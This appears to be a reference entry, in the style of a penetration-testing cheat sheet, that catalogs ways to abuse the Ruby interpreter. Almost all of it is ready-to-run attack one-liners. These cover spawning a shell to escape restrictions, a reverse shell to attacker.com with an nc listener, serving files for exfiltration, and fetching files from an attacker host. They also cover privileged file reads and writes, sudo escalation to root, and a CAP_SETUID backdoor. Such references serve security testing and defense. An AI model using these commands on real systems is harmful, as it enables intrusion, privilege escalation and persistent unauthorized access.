It can be used to break out from restricted environments by spawning an interactive system shell.
ruby -e 'exec "/bin/sh"'
It can send back a reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345
on the attacker box to receive the shell.
export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
It can exfiltrate files on the network.
Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
export LPORT=8888
ruby -run -e httpd . -p $LPORT
It can download remote files.
Fetch a remote file via HTTP GET request.
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
ruby -e 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
ruby -e 'puts File.read("file_to_read")'
It loads shared libraries that may be used to run code in the binary execution context.
ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo
.
sudo ruby -e 'exec "/bin/sh"'
It can manipulate its process UID and can be used on Linux as a backdoor to maintain
elevated privileges with the CAP_SETUID
capability set. This also works when executed
by another binary with the capability set.
cp $(which ruby) .
sudo setcap cap_setuid+ep ruby
./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'